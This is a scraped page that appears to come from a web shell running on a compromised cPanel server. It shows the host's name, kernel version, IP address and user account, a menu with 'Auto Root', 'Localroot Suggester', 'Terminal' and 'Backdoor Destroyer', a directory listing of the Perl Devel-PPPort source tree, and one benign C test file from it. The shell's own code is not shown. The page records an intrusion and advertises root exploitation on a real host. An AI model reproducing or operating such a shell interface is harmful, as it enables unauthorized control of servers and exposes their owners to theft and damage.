Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
cpan /
Devel-PPPort /
Delete
Unzip
Name
Size
Permission
Date
Action
blib
[ DIR ]
drwxr-xr-x
2016-10-10 17:39
devel
[ DIR ]
drwxr-xr-x
2015-02-14 16:55
parts
[ DIR ]
drwxr-xr-x
2015-02-14 16:55
t
[ DIR ]
drwxr-xr-x
2015-02-14 16:55
HACKERS
9.94
KB
-r--r--r--
2014-12-27 11:49
Makefile
30.79
KB
-rw-r--r--
2016-10-10 17:38
Makefile.PL
3.39
KB
-r--r--r--
2014-12-27 11:49
PPPort.bs
0
B
-rw-r--r--
2016-10-10 17:41
PPPort.pm
209.01
KB
-rw-r--r--
2016-10-10 17:39
PPPort.xs
192
B
-r--r--r--
2014-12-27 11:48
PPPort_pm.PL
15.21
KB
-r--r--r--
2014-12-27 11:49
PPPort_xs.PL
3.77
KB
-r--r--r--
2014-12-27 11:48
RealPPPort.c
112.83
KB
-rw-r--r--
2016-10-10 17:39
RealPPPort.o
165.66
KB
-rw-r--r--
2016-10-10 17:39
RealPPPort.xs
53.22
KB
-rw-r--r--
2016-10-10 17:39
apicheck_c.PL
806
B
-r--r--r--
2014-12-27 11:48
mktests.PL
2.66
KB
-r--r--r--
2014-12-27 11:48
module2.c
1.25
KB
-rw-r--r--
2014-12-27 11:48
module2.o
2.63
KB
-rw-r--r--
2016-10-10 17:39
module3.c
1.42
KB
-rw-r--r--
2014-12-27 11:48
module3.o
4.39
KB
-rw-r--r--
2016-10-10 17:39
pm_to_blib
0
B
-rw-r--r--
2016-10-10 17:39
ppport.h
183
KB
-rw-r--r--
2016-10-10 17:39
ppport_h.PL
733
B
-r--r--r--
2014-12-27 11:48
soak
12.62
KB
-r--r--r--
2014-12-27 11:49
typemap
1.01
KB
-r--r--r--
2014-12-27 11:48
Save
Rename
/******************************************************************************* * * Perl/Pollution/Portability * ******************************************************************************** * * Version 3.x, Copyright (C) 2004-2013, Marcus Holland-Moritz. * Version 2.x, Copyright (C) 2001, Paul Marquess. * Version 1.x, Copyright (C) 1999, Kenneth Albanowski. * * This program is free software; you can redistribute it and/or * modify it under the same terms as Perl itself. * *******************************************************************************/ #include "EXTERN.h" #include "perl.h" #define NEED_PL_parser #define NO_XSLOCKS #include "XSUB.h" #include "ppport.h" static void throws_exception(int throw_e) { if (throw_e) croak("boo\n"); } int exception(int throw_e) { dTHR; dXCPT; SV *caught = get_sv("Devel::PPPort::exception_caught", 0); XCPT_TRY_START { throws_exception(throw_e); } XCPT_TRY_END XCPT_CATCH { sv_setiv(caught, 1); XCPT_RETHROW; } sv_setiv(caught, 0); return 42; } void call_newCONSTSUB_3(void) { newCONSTSUB(gv_stashpv("Devel::PPPort", FALSE), "test_value_3", newSViv(3)); } U32 get_PL_signals_3(void) { return PL_signals; } int dummy_parser_warning(void) { char * volatile my_bufptr; char * volatile *my_p_bufptr; my_bufptr = PL_bufptr; my_p_bufptr = &PL_bufptr; PL_bufptr = my_bufptr; PL_bufptr = *my_p_bufptr; return &PL_bufptr != NULL; }